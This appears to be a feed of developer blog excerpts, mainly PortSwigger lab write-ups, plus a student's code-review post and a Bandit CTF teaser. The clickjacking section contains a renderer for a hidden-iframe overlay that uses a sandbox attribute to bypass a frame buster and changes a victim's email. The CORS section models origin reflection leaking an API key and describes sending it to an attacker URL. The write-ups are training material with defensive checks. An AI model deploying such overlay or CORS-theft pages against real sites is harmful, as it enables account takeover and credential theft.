Tech Rumors
We need to modify the location of the CLICK ME div tag so that it is on top of the Update Email button on the vulnerable website. Note that we are setting the iframe's opacity to 0.1 to be able to check the exploit's appearance, and then modifying the div's top and left CSS properties so that when a logged-in user clicks on the CLICK ME div on our website, they are actually clicking on the vulnerable website's button to update their email to whatever we previously set in the URL parameters. After setting the top property to 450px and the left property to 50px, it looks like the buttons are aligned to perform a successful attack. At this point, our exploit looks like this:

[exploit HTML not preserved in this excerpt; only the decoy text "CLICK HERE" survives]

All we need to do is set the iframe's opacity to 0.00001 or something similar so that it is almost invisible and send the exploit to our victim.

Check out this write up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script/

Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-a-frame-buster-script
#webdev #portswigger #clickjacking #writeup
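Added example, not code from the write-up or its GitHub repo above. Two helpers a tester wants around the overlay page the post describes: a check of the target's response headers that decides whether a page on the attacker's origin is allowed to frame it (only X-Frame-Options and CSP frame-ancestors count; a script-based frame buster, which this lab has, does not, because the iframe sandbox attribute stops the framed page's scripts from running), and a renderer for the overlay page itself with the iframe opacity, div offsets and sandbox attribute as parameters. The target URL, email value, attacker origin and the header sets are constructed placeholders; the sandbox="allow-forms" bypass is the standard technique for this lab and is not shown in the excerpt.

```javascript
// Added example (not from the write-up). Placeholders: attacker origin, target
// URL, email value and every header set below are constructed.

// Lower-case header names so lookups are case-insensitive.
function normaliseHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = String(value);
  }
  return out;
}

// Decide whether a page at attackerOrigin may embed the target in an iframe.
// Returns { framable, reason }. CSP frame-ancestors, when present, takes
// precedence over X-Frame-Options, as browsers do. Host sources are matched
// exactly; wildcard host patterns are not handled here.
function isFramableBy(rawHeaders, attackerOrigin) {
  const h = normaliseHeaders(rawHeaders);
  const csp = h['content-security-policy'] || '';
  const directive = csp
    .split(';')
    .map((d) => d.trim())
    .find((d) => d.startsWith('frame-ancestors'));
  if (directive) {
    const sources = directive
      .split(/\s+/)
      .slice(1)
      .map((s) => s.replace(/^'|'$/g, ''));
    if (sources.includes('*') || sources.includes(attackerOrigin)) {
      return { framable: true, reason: `frame-ancestors allows ${attackerOrigin}` };
    }
    return { framable: false, reason: `frame-ancestors ${sources.join(' ')}` };
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    return { framable: false, reason: `X-Frame-Options: ${xfo}` };
  }
  // No header-level protection. A JavaScript frame buster on the target page is
  // not a defence: the sandbox attribute on the attacker's iframe keeps it from running.
  return { framable: true, reason: 'no X-Frame-Options or frame-ancestors' };
}

// Render the overlay page. The iframe sits on top (z-index 2) at low opacity so
// clicks land on the real button; the decoy div sits underneath at the offsets
// found while aligning with opacity 0.1. sandbox="allow-forms" lets the framed
// page submit its form but denies it scripts, so its frame buster never executes.
function buildClickjackPage({ targetUrl, top, left, opacity, decoyText = 'CLICK ME' }) {
  return [
    '<style>',
    `  iframe { position: relative; width: 500px; height: 700px; opacity: ${opacity}; z-index: 2; }`,
    `  div { position: absolute; top: ${top}px; left: ${left}px; z-index: 1; }`,
    '</style>',
    `<div>${decoyText}</div>`,
    `<iframe sandbox="allow-forms" src="${targetUrl}"></iframe>`,
  ].join('\n');
}

// Constructed target headers: a session cookie and no framing protection.
const targetHeaders = {
  'Content-Type': 'text/html; charset=utf-8',
  'Set-Cookie': 'session=CONSTRUCTED; HttpOnly; Secure',
};
const check = isFramableBy(targetHeaders, 'https://attacker.example');
if (check.framable) {
  // Alignment build first (opacity 0.1); drop opacity to 0.00001 for the victim.
  const page = buildClickjackPage({
    targetUrl: 'https://TARGET-LAB.example/my-account?email=hacker@attacker.example', // placeholder
    top: 450,
    left: 50,
    opacity: 0.1,
  });
  console.log(page);
}
```

Run it with node to print the overlay page. The check is the part to keep after the lab: if isFramableBy returns framable for a page that only relies on a frame-busting script, the fix on the target side is a Content-Security-Policy frame-ancestors directive (or X-Frame-Options), not more JavaScript.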

3. Internal Code Review - 1
Reviewing code is not really my strong suit. It takes a lot of time and effort, something I lack. But I knew it was an essential tool to programmers, taking in and considering better alternatives for code, as well as optimizing it. So I had to push through, and eventually I found several errors within my first review:



Review

My first ever code review, I decided to do within my-photohub. I reviewed a fellow student's code, that being SerpentBytes'. I tried nitpicking at the small details.

After that, I then decided to clone his code locally via the use of HTTPS cloning, and I couldn't really find anything that caught my eye. So I decided to use ESLint for any syntax issues. ESLint found several, one of which was an unused import.

After I submitted what I found, the author of the pull request contacted me to help him test out the new version after he had made the changes. He walked me through getting my personal access tokens. It took a while because I did not have gh_ before my token name, which then caused me to get an error 400, since it was an invalid request.

So after getting that sorted out, when I added the proper credentials with an access token that does begin with gh_, I finally got a passing message 200. He then asked me to check my GitHub if a repository has been created or not. When I checked, a new repository had been created in my account.

He then asked me to re-input the access token so I did as he told. It was to check whether you can use the same access token twice. Tested it out, and a new repository had been created. So it was working completely as intended.



Thoughts

It was great to work collaboratively on these issues as an open source community. I learned a lot from reviewing other people's code, and it was interesting to see how everyone tried to approach similar tasks in different ways. Overall, I hope that these reviews will help to improve the code quality in the future.
#javascript #opensource #testing #github

Portswigger’s lab write up: CORS vulnerability with basic origin reflection
In this apprentice-level lab, we will exploit a website with a basic CORS vulnerability to obtain a user's private credentials.

Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
"username": "wiener",
"email": "",
"apikey": "JQ7…
#webdev #portswigger #cors #writeup
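Added example, not code from the write-up above. It models the two halves of this lab offline: the server's decision about which Access-Control-* headers to emit for a given Origin (the vulnerable origin-reflection behaviour beside an allowlist), and the browser's rule for credentialed cross-origin reads (the response is exposed only if Access-Control-Allow-Origin equals the requesting origin exactly and Access-Control-Allow-Credentials is exactly "true"; a wildcard is rejected when cookies are sent). The trusted origin, attacker origin and the API key in the body are constructed placeholders.

```javascript
// Added example (not from the write-up). Origins and the API key are constructed.

const REFLECT = 'reflect';     // the lab's vulnerable behaviour
const ALLOWLIST = 'allowlist'; // the fix
const TRUSTED_ORIGINS = new Set(['https://app.example']); // assumption

// Server side: headers /accountDetails emits for a request carrying originHeader.
function corsHeaders(originHeader, mode) {
  const headers = { 'Content-Type': 'application/json; charset=utf-8' };
  if (originHeader === undefined) return headers; // no Origin header: nothing to grant

  if (mode === REFLECT) {
    // The bug: whatever Origin the client sent is echoed back, and credentials
    // are allowed, so any site a victim visits can read the authenticated response.
    headers['Access-Control-Allow-Origin'] = originHeader;
    headers['Access-Control-Allow-Credentials'] = 'true';
  } else if (TRUSTED_ORIGINS.has(originHeader)) {
    // Only a known origin is echoed. Vary: Origin stops a shared cache from
    // serving one origin's Access-Control-Allow-Origin to another.
    headers['Access-Control-Allow-Origin'] = originHeader;
    headers['Access-Control-Allow-Credentials'] = 'true';
    headers['Vary'] = 'Origin';
  }
  return headers;
}

// Browser side: may a page at requestingOrigin read a response it fetched with
// credentials (cookies) included? For credentialed requests the browser requires
// an exact origin match ('*' is not accepted) and the literal value "true".
function browserExposesResponse(headers, requestingOrigin) {
  const acao = headers['Access-Control-Allow-Origin'];
  const acac = headers['Access-Control-Allow-Credentials'];
  return acao === requestingOrigin && acac === 'true';
}

// End to end: what the attacker's page obtains, the API key or null.
function attackerReadsApiKey(mode, attackerOrigin) {
  // Constructed stand-in for the lab's /accountDetails body.
  const body = { username: 'wiener', email: '', apikey: 'CONSTRUCTED-KEY' };
  const headers = corsHeaders(attackerOrigin, mode);
  return browserExposesResponse(headers, attackerOrigin) ? body.apikey : null;
}

console.log('reflect  :', attackerReadsApiKey(REFLECT, 'https://evil.example'));   // key leaks
console.log('allowlist:', attackerReadsApiKey(ALLOWLIST, 'https://evil.example')); // null
```

In the lab itself the attacker side is a page on the exploit server that fetches /accountDetails with credentials included and forwards the response body to a URL the attacker controls; the function attackerReadsApiKey above is the offline equivalent of that read. The check worth automating is the first one: send a request with an arbitrary Origin header and see whether it comes back verbatim together with Access-Control-Allow-Credentials: true.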

Bandit Level 0
Introduction Bandit0 is the first level of the OverTheWire Bandit wargame. In this level,...
#writeup #ctf #overthewire #bandit